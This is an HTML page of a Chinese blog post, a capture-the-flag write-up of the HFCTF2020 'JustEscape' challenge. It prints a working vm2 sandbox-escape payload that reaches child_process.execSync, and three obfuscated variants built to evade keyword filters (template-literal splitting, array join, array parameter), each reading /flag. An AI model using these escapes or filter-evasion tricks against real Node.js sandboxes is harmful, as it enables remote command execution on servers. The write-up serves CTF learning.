
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>HFCTF2020JustEscape - 月出从云</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="一道VM2的沙箱逃逸..
知识点
沙箱逃逸
Payload拼接(?)

做题思路这道题目伪装成PHP是真滴恶心，首先我们访问可以得到一个用Vue框架写的页面：

尝试直接访问index.php的话可,"> 
    
    <link rel="alternative" href="atom.xml" title="月出从云" type="application/atom+xml"> 
    <link rel="icon" href="/img/1.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">月出从云</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">HFCTF2020JustEscape</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">HFCTF2020JustEscape</h1>
        <div class="stuff">
            <span>十二月 17, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/BUU/" rel="tag">BUU</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/Javascirpt/" rel="tag">Javascirpt</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/vm2%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/" rel="tag">vm2沙箱逃逸</a></li></ul>


        </div>
        <div class="content markdown">
            <p>一道VM2的沙箱逃逸..</p>
<h1 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h1><ul>
<li>沙箱逃逸</li>
<li>Payload拼接(?)</li>
</ul>
<h1 id="做题思路"><a href="#做题思路" class="headerlink" title="做题思路"></a>做题思路</h1><p>这道题目伪装成PHP是真滴恶心，首先我们访问可以得到一个用Vue框架写的页面：</p>
<p><img src="image-20201217143745895.png" alt="image-20201217143745895"></p>
<p>尝试直接访问index.php的话可以得到一段php源码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>( array_key_exists( <span class="string">&quot;code&quot;</span>, $_GET ) &amp;&amp; $_GET[ <span class="string">&#x27;code&#x27;</span> ] != <span class="literal">NULL</span> ) &#123;</span><br><span class="line">    $code = $_GET[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">echo</span> <span class="keyword">eval</span>(code);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>结果你就会发现这个code是没加$符号的也就是说他没用..那么再回到之前的code的部分，大概也是真的eval了这段代码，看看是不是Javascript</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=<span class="built_in">Error</span>().stack</span><br></pre></td></tr></table></figure>



<p><img src="image-20201217144354519.png" alt="image-20201217144354519"></p>
<p>果然是JS，而且我们可以知道是VM2的沙箱，那么如何沙箱逃逸呢？👴一点JS也不懂，没法子只能去GITHUB上嫖，找到：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/issues/225">vm2沙箱逃逸</a>，可以看到：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&quot;use strict&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> &#123;VM&#125; = <span class="built_in">require</span>(<span class="string">&#x27;vm2&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> untrusted = <span class="string">&#x27;(&#x27;</span> + <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	<span class="built_in">TypeError</span>.prototype.get_process = <span class="function"><span class="params">f</span>=&gt;</span>f.constructor(<span class="string">&quot;return process&quot;</span>)();</span><br><span class="line">	<span class="keyword">try</span>&#123;</span><br><span class="line">		<span class="built_in">Object</span>.preventExtensions(Buffer.from(<span class="string">&quot;&quot;</span>)).a = <span class="number">1</span>;</span><br><span class="line">	&#125;<span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> e.get_process(<span class="function">()=&gt;</span>&#123;&#125;).mainModule.require(<span class="string">&quot;child_process&quot;</span>).execSync(<span class="string">&quot;whoami&quot;</span>).toString();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;+<span class="string">&#x27;)()&#x27;</span>;</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(<span class="keyword">new</span> VM().run(untrusted));</span><br><span class="line">&#125;<span class="function"><span class="title">catch</span>(<span class="params">x</span>)</span>&#123;</span><br><span class="line">	<span class="built_in">console</span>.log(x);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>尝试复制粘贴【</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	<span class="built_in">TypeError</span>.prototype.get_process = <span class="function"><span class="params">f</span>=&gt;</span>f.constructor(<span class="string">&quot;return process&quot;</span>)();</span><br><span class="line">	<span class="keyword">try</span>&#123;</span><br><span class="line">		<span class="built_in">Object</span>.preventExtensions(Buffer.from(<span class="string">&quot;&quot;</span>)).a = <span class="number">1</span>;</span><br><span class="line">	&#125;<span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> e.get_process(<span class="function">()=&gt;</span>&#123;&#125;).mainModule.require(<span class="string">&quot;child_process&quot;</span>).execSync(<span class="string">&quot;whoami&quot;</span>).toString();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;()</span><br></pre></td></tr></table></figure>

<p>好的打不过，倒地只能看WP了，别人给出的POC：</p>
<h2 id="POC-1"><a href="#POC-1" class="headerlink" title="POC 1"></a>POC 1</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> (<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="built_in">TypeError</span>[<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`prototyp`</span>&#125;</span>e`</span>&#125;</span>`</span>][<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`get_pro`</span>&#125;</span>cess`</span>&#125;</span>`</span>] = <span class="function"><span class="params">f</span>=&gt;</span>f[<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`constructo`</span>&#125;</span>r`</span>&#125;</span>`</span>](<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`return proc`</span>&#125;</span>ess`</span>&#125;</span>`</span>)();</span><br><span class="line">    <span class="keyword">try</span>&#123;</span><br><span class="line">        <span class="built_in">Object</span>.preventExtensions(Buffer.from(<span class="string">``</span>)).a = <span class="number">1</span>;</span><br><span class="line">    &#125;<span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> e[<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`get_pro`</span>&#125;</span>cess`</span>&#125;</span>`</span>](<span class="function">()=&gt;</span>&#123;&#125;).mainModule[<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`requir`</span>&#125;</span>e`</span>&#125;</span>`</span>](<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`child_proces`</span>&#125;</span>s`</span>&#125;</span>`</span>)[<span class="string">`<span class="subst">$&#123;<span class="string">`<span class="subst">$&#123;<span class="string">`exe`</span>&#125;</span>cSync`</span>&#125;</span>`</span>](<span class="string">`cat /flag`</span>).toString();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>呃..?这里看起来是进行了拼接，自己不懂原理的话就先学会怎么拼接payload吧,在JS中我们可以用反引号来代替单引号和双引号：</p>
<h3 id="的语法"><a href="#的语法" class="headerlink" title="`的语法"></a>`的语法</h3><p>ES6 模板字符串(Template String)是增强版的字符串，用反引号(`)标识，它可以当作普通字符串使用，也可以用来定义多行字符串，或者在字符串中嵌入变量。<a target="_blank" rel="noopener" href="https://www.cnblogs.com/alummox/p/11343269.html">介绍博客</a>,从此处我们可以得到反引号作用：</p>
<ul>
<li>代替字符串的双引号和单引号</li>
<li>可以包含特定语法的占位符</li>
<li>配合${}符号可以包含变量</li>
</ul>
<p>例子：</p>
<p>原本我们输出多行字符串应该这样来写：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(<span class="string">&#x27;string text line 1\n&#x27;</span> +</span><br><span class="line"><span class="string">&#x27;string text line 2&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>使用反引号之后:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(<span class="string">`string text line 1</span></span><br><span class="line"><span class="string">string text line 2`</span>);</span><br></pre></td></tr></table></figure>

<p><img src="image-20201217151045490.png" alt="image-20201217151045490"></p>
<p>当其与${}搭配之后更是可以大大降低我们书写字符串的格式化问题：</p>
<p><img src="image-20201217151200088.png" alt="image-20201217151200088"></p>
<p>那么现在回到题目来，我们需要拼接变量该如何操作呢？很简单，只需要先用反引号将需要的东西包含起来，再用${}即可表示为一个变量：</p>
<p><img src="image-20201217151634833.png" alt="image-20201217151634833"></p>
<h3 id="的语法-1"><a href="#的语法-1" class="headerlink" title="[]的语法"></a>[]的语法</h3><p>如果不允许我们使用点号，我们可以使用[]来绕过：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_39125684/article/details/80327218">JS中的中括号</a></p>
<p>这样的话我们就可以任意的绕过关键参数匹配，拼接出上图的Payload了</p>
<h2 id="POC-2"><a href="#POC-2" class="headerlink" title="POC 2"></a>POC 2</h2><p>利用join来拼接字符串：</p>
<h3 id="JOIN"><a href="#JOIN" class="headerlink" title="JOIN"></a>JOIN</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function">()=&gt;</span>&#123; <span class="built_in">TypeError</span>[[<span class="string">`p`</span>,<span class="string">`r`</span>,<span class="string">`o`</span>,<span class="string">`t`</span>,<span class="string">`o`</span>,<span class="string">`t`</span>,<span class="string">`y`</span>,<span class="string">`p`</span>,<span class="string">`e`</span>][<span class="string">`join`</span>](<span class="string">``</span>)][<span class="string">`a`</span>] = <span class="function"><span class="params">f</span>=&gt;</span>f[[<span class="string">`c`</span>,<span class="string">`o`</span>,<span class="string">`n`</span>,<span class="string">`s`</span>,<span class="string">`t`</span>,<span class="string">`r`</span>,<span class="string">`u`</span>,<span class="string">`c`</span>,<span class="string">`t`</span>,<span class="string">`o`</span>,<span class="string">`r`</span>][<span class="string">`join`</span>](<span class="string">``</span>)]([<span class="string">`r`</span>,<span class="string">`e`</span>,<span class="string">`t`</span>,<span class="string">`u`</span>,<span class="string">`r`</span>,<span class="string">`n`</span>,<span class="string">` `</span>,<span class="string">`p`</span>,<span class="string">`r`</span>,<span class="string">`o`</span>,<span class="string">`c`</span>,<span class="string">`e`</span>,<span class="string">`s`</span>,<span class="string">`s`</span>][<span class="string">`join`</span>](<span class="string">``</span>))(); <span class="keyword">try</span>&#123; <span class="built_in">Object</span>[<span class="string">`preventExtensions`</span>](Buffer[<span class="string">`from`</span>](<span class="string">``</span>))[<span class="string">`a`</span>] = <span class="number">1</span>; &#125;<span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span>&#123; <span class="keyword">return</span> e[<span class="string">`a`</span>](<span class="function">()=&gt;</span>&#123;&#125;)[<span class="string">`mainModule`</span>][[<span class="string">`r`</span>,<span class="string">`e`</span>,<span class="string">`q`</span>,<span class="string">`u`</span>,<span class="string">`i`</span>,<span class="string">`r`</span>,<span class="string">`e`</span>][<span class="string">`join`</span>](<span class="string">``</span>)]([<span class="string">`c`</span>,<span class="string">`h`</span>,<span class="string">`i`</span>,<span class="string">`l`</span>,<span class="string">`d`</span>,<span class="string">`_`</span>,<span class="string">`p`</span>,<span class="string">`r`</span>,<span class="string">`o`</span>,<span class="string">`c`</span>,<span class="string">`e`</span>,<span class="string">`s`</span>,<span class="string">`s`</span>][<span class="string">`join`</span>](<span class="string">``</span>))[[<span class="string">`e`</span>,<span class="string">`x`</span>,<span class="string">`e`</span>,<span class="string">`c`</span>,<span class="string">`S`</span>,<span class="string">`y`</span>,<span class="string">`n`</span>,<span class="string">`c`</span>][<span class="string">`join`</span>](<span class="string">``</span>)](<span class="string">`cat /flag`</span>)[<span class="string">`toString`</span>](); &#125; &#125;)()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>JS当中使用join()中添加参数来决定如何拼接，如果不添加默认用,分割开来，如果为0就会拼接在一起了</p>
<h2 id="POC-3"><a href="#POC-3" class="headerlink" title="POC 3"></a>POC 3</h2><h3 id="数组绕过"><a href="#数组绕过" class="headerlink" title="数组绕过"></a>数组绕过</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">code[]=(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	<span class="built_in">TypeError</span>.prototype.get_process = <span class="function"><span class="params">f</span>=&gt;</span>f.constructor(<span class="string">&quot;return process&quot;</span>)();</span><br><span class="line">	<span class="keyword">try</span>&#123;</span><br><span class="line">		<span class="built_in">Object</span>.preventExtensions(Buffer.from(<span class="string">&quot;&quot;</span>)).a = <span class="number">1</span>;</span><br><span class="line">	&#125;<span class="function"><span class="title">catch</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> e.get_process(<span class="function">()=&gt;</span>&#123;&#125;).mainModule.require(<span class="string">&quot;child_process&quot;</span>).execSync(<span class="string">&quot;cat /flag&quot;</span>).toString();</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<h1 id="VM2沙箱逃逸原理"><a href="#VM2沙箱逃逸原理" class="headerlink" title="VM2沙箱逃逸原理"></a>VM2沙箱逃逸原理</h1><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/207291">先丢在这，不敢碰我npm环境现在</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r='https://github.com/ysllz/ysllz.github.io'
        data-o='https://github.com/ysllz/ysllz.github.io'
        data-a='ysllz'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-number">1.</span> <span class="toc-text">知识点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%81%9A%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">2.</span> <span class="toc-text">做题思路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-1"><span class="toc-number">2.1.</span> <span class="toc-text">POC 1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9A%84%E8%AF%AD%E6%B3%95"><span class="toc-number">2.1.1.</span> <span class="toc-text">&#96;的语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9A%84%E8%AF%AD%E6%B3%95-1"><span class="toc-number">2.1.2.</span> <span class="toc-text">[]的语法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-2"><span class="toc-number">2.2.</span> <span class="toc-text">POC 2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#JOIN"><span class="toc-number">2.2.1.</span> <span class="toc-text">JOIN</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-3"><span class="toc-number">2.3.</span> <span class="toc-text">POC 3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.3.1.</span> <span class="toc-text">数组绕过</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#VM2%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E5%8E%9F%E7%90%86"><span class="toc-number">3.</span> <span class="toc-text">VM2沙箱逃逸原理</span></a></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
